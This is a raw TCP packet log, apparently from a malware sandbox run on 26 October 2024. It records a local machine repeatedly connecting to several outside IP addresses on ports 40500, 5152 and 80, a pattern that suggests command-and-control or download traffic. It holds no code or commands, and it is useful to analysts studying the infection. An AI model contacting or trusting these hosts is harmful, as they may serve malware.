                                                                                                                                                                                            Oct 26, 2024 07:27:47.109019995 CEST5000940500192.168.2.678.37.229.249
                                                                                                                                                                                            Oct 26, 2024 07:27:47.109457016 CEST5000940500192.168.2.678.37.229.249
                                                                                                                                                                                            Oct 26, 2024 07:27:47.114415884 CEST405005000978.37.229.249192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:47.155421972 CEST405005000978.37.229.249192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:47.804666996 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:47.905838966 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:49.186371088 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:49.186975956 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:49.192291021 CEST804999891.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:49.192315102 CEST805001091.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:49.192369938 CEST4999880192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:49.192418098 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:49.201984882 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:49.207254887 CEST805001091.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.559824944 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560491085 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560547113 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560823917 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560863972 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560899973 CEST805001091.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560944080 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:50.560971022 CEST805001091.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561014891 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561023951 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561094999 CEST405005000559.91.192.122192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561106920 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561108112 CEST805001091.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561142921 CEST5000540500192.168.2.659.91.192.122
                                                                                                                                                                                            Oct 26, 2024 07:27:50.561203003 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:52.125221014 CEST5001140500192.168.2.65.239.153.192
                                                                                                                                                                                            Oct 26, 2024 07:27:52.130700111 CEST40500500115.239.153.192192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:52.134753942 CEST5001140500192.168.2.65.239.153.192
                                                                                                                                                                                            Oct 26, 2024 07:27:52.135940075 CEST5001140500192.168.2.65.239.153.192
                                                                                                                                                                                            Oct 26, 2024 07:27:52.141690969 CEST40500500115.239.153.192192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:52.142776012 CEST5001140500192.168.2.65.239.153.192
                                                                                                                                                                                            Oct 26, 2024 07:27:52.149808884 CEST40500500115.239.153.192192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:52.171471119 CEST5001140500192.168.2.65.239.153.192
                                                                                                                                                                                            Oct 26, 2024 07:27:52.219511032 CEST40500500115.239.153.192192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:52.652053118 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:52.652419090 CEST5001280192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:52.657727957 CEST805001291.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:52.657773018 CEST805001091.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:52.657865047 CEST5001080192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:52.657970905 CEST5001280192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:52.705173016 CEST5001280192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:52.710581064 CEST805001291.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:53.559186935 CEST805001291.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:53.559329987 CEST5001280192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:55.595391035 CEST405005000978.37.229.249192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:55.595454931 CEST5000940500192.168.2.678.37.229.249
                                                                                                                                                                                            Oct 26, 2024 07:27:55.620553970 CEST5001280192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:55.620862007 CEST5001380192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:55.626472950 CEST805001291.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:55.626589060 CEST5001280192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:55.626636982 CEST805001391.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:55.626702070 CEST5001380192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:55.626848936 CEST5001380192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:55.632178068 CEST805001391.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:56.509474993 CEST805001391.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:56.509546995 CEST5001380192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:57.172278881 CEST5001440500192.168.2.6178.22.171.158
                                                                                                                                                                                            Oct 26, 2024 07:27:57.177673101 CEST4050050014178.22.171.158192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:57.177776098 CEST5001440500192.168.2.6178.22.171.158
                                                                                                                                                                                            Oct 26, 2024 07:27:57.179096937 CEST5001440500192.168.2.6178.22.171.158
                                                                                                                                                                                            Oct 26, 2024 07:27:57.184438944 CEST4050050014178.22.171.158192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:57.184535027 CEST5001440500192.168.2.6178.22.171.158
                                                                                                                                                                                            Oct 26, 2024 07:27:57.189961910 CEST4050050014178.22.171.158192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:57.202759981 CEST5001440500192.168.2.6178.22.171.158
                                                                                                                                                                                            Oct 26, 2024 07:27:57.251390934 CEST4050050014178.22.171.158192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:58.656124115 CEST5001380192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:58.656523943 CEST5001580192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:58.661824942 CEST805001391.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:58.661844015 CEST805001591.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:58.661904097 CEST5001380192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:58.661941051 CEST5001580192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:58.683264017 CEST5001580192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:58.688581944 CEST805001591.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:59.475634098 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:59.587367058 CEST805001591.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:59.587464094 CEST5001580192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:59.596338034 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:00.612231970 CEST40500500115.239.153.192192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:00.612297058 CEST5001140500192.168.2.65.239.153.192
                                                                                                                                                                                            Oct 26, 2024 07:28:01.709266901 CEST5001580192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:01.709625959 CEST5001680192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:01.716198921 CEST805001691.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:01.716284990 CEST5001680192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:01.716332912 CEST805001591.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:01.716382027 CEST5001580192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:01.729651928 CEST5001680192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:01.735004902 CEST805001691.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:02.219127893 CEST5001740500192.168.2.62.178.164.63
                                                                                                                                                                                            Oct 26, 2024 07:28:02.224679947 CEST40500500172.178.164.63192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:02.224761009 CEST5001740500192.168.2.62.178.164.63
                                                                                                                                                                                            Oct 26, 2024 07:28:02.226198912 CEST5001740500192.168.2.62.178.164.63
                                                                                                                                                                                            Oct 26, 2024 07:28:02.231497049 CEST40500500172.178.164.63192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:02.231554031 CEST5001740500192.168.2.62.178.164.63
                                                                                                                                                                                            Oct 26, 2024 07:28:02.236934900 CEST40500500172.178.164.63192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:02.280787945 CEST5001740500192.168.2.62.178.164.63
                                                                                                                                                                                            Oct 26, 2024 07:28:02.327573061 CEST40500500172.178.164.63192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:02.679735899 CEST805001691.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:02.679855108 CEST5001680192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:05.666534901 CEST4050050014178.22.171.158192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:05.666723967 CEST5001440500192.168.2.6178.22.171.158
                                                                                                                                                                                            Oct 26, 2024 07:28:05.984841108 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:05.990386009 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:05.990473986 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.002042055 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.007375956 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897535086 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897577047 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897631884 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897629023 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897629976 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897689104 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897706032 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897720098 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897746086 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897757053 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897766113 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897794962 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897799969 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897825956 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897844076 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897861958 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897882938 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897897005 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897908926 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.897953987 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903274059 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903346062 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903366089 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903419971 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903515100 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903549910 CEST8050018185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903570890 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903601885 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.909336090 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:06.909375906 CEST5001880192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:07.281598091 CEST5001940500192.168.2.694.230.230.211
                                                                                                                                                                                            Oct 26, 2024 07:28:07.287230015 CEST405005001994.230.230.211192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:07.287328005 CEST5001940500192.168.2.694.230.230.211
                                                                                                                                                                                            Oct 26, 2024 07:28:07.288655043 CEST5001940500192.168.2.694.230.230.211
                                                                                                                                                                                            Oct 26, 2024 07:28:07.294421911 CEST405005001994.230.230.211192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:07.294472933 CEST5001940500192.168.2.694.230.230.211
                                                                                                                                                                                            Oct 26, 2024 07:28:07.296462059 CEST5001940500192.168.2.694.230.230.211
                                                                                                                                                                                            Oct 26, 2024 07:28:07.299942017 CEST405005001994.230.230.211192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:07.343620062 CEST405005001994.230.230.211192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:08.943833113 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:08.949275970 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:08.949368000 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:08.950253010 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:08.955666065 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853734016 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853780985 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853843927 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853866100 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853883028 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853904963 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853920937 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853931904 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853961945 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853970051 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854001999 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854007006 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854037046 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854043961 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854068041 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854077101 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854104996 CEST8050020185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854110003 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854159117 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854768038 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854803085 CEST5002080192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:10.702508926 CEST40500500172.178.164.63192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:10.702641010 CEST5001740500192.168.2.62.178.164.63
                                                                                                                                                                                            Oct 26, 2024 07:28:11.878298998 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:11.885489941 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:11.889779091 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:11.889955044 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:11.897690058 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.297275066 CEST5002240500192.168.2.65.237.148.223
                                                                                                                                                                                            Oct 26, 2024 07:28:12.305001020 CEST40500500225.237.148.223192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.305107117 CEST5002240500192.168.2.65.237.148.223
                                                                                                                                                                                            Oct 26, 2024 07:28:12.306389093 CEST5002240500192.168.2.65.237.148.223
                                                                                                                                                                                            Oct 26, 2024 07:28:12.311804056 CEST40500500225.237.148.223192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.311882019 CEST5002240500192.168.2.65.237.148.223
                                                                                                                                                                                            Oct 26, 2024 07:28:12.312047958 CEST5002240500192.168.2.65.237.148.223
                                                                                                                                                                                            Oct 26, 2024 07:28:12.317207098 CEST40500500225.237.148.223192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.365039110 CEST40500500225.237.148.223192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788755894 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788774014 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788794994 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788806915 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788817883 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788842916 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788861036 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788862944 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788876057 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788887978 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788899899 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788904905 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788934946 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788934946 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.790062904 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.790064096 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.794302940 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.794375896 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.794378042 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.794425011 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.794692993 CEST8050021185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:12.794742107 CEST5002180192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:14.525397062 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:14.593740940 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:14.885443926 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:14.891196012 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:14.891304970 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:14.895416021 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:14.901042938 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.764585018 CEST405005001994.230.230.211192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.764695883 CEST5001940500192.168.2.694.230.230.211
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799163103 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799196005 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799232960 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799252987 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799280882 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799303055 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799300909 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799300909 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799333096 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799351931 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799370050 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799397945 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799406052 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799406052 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799407005 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799732924 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.804799080 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.804831028 CEST8050023185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.804896116 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.931427002 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.931509018 CEST5002380192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:17.312933922 CEST5002440500192.168.2.637.151.113.156
                                                                                                                                                                                            Oct 26, 2024 07:28:17.318671942 CEST405005002437.151.113.156192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:17.318752050 CEST5002440500192.168.2.637.151.113.156
                                                                                                                                                                                            Oct 26, 2024 07:28:17.319943905 CEST5002440500192.168.2.637.151.113.156
                                                                                                                                                                                            Oct 26, 2024 07:28:17.327095032 CEST405005002437.151.113.156192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:17.327150106 CEST5002440500192.168.2.637.151.113.156
                                                                                                                                                                                            Oct 26, 2024 07:28:17.327750921 CEST5002440500192.168.2.637.151.113.156
                                                                                                                                                                                            Oct 26, 2024 07:28:17.333482027 CEST405005002437.151.113.156192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:17.375608921 CEST405005002437.151.113.156192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:18.260000944 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:18.265351057 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:18.265424013 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:18.270478964 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:18.275820017 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210041046 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210120916 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210283041 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210302114 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210346937 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210346937 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210366011 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210385084 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210405111 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210407972 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210418940 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210424900 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.210463047 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211889982 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211910009 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211930037 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211951971 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.211997986 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.218785048 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.218806982 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.218871117 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.218871117 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.218914986 CEST8050025185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:19.218954086 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.238321066 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:19.238409042 CEST5002580192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:20.850712061 CEST40500500225.237.148.223192.168.2.6
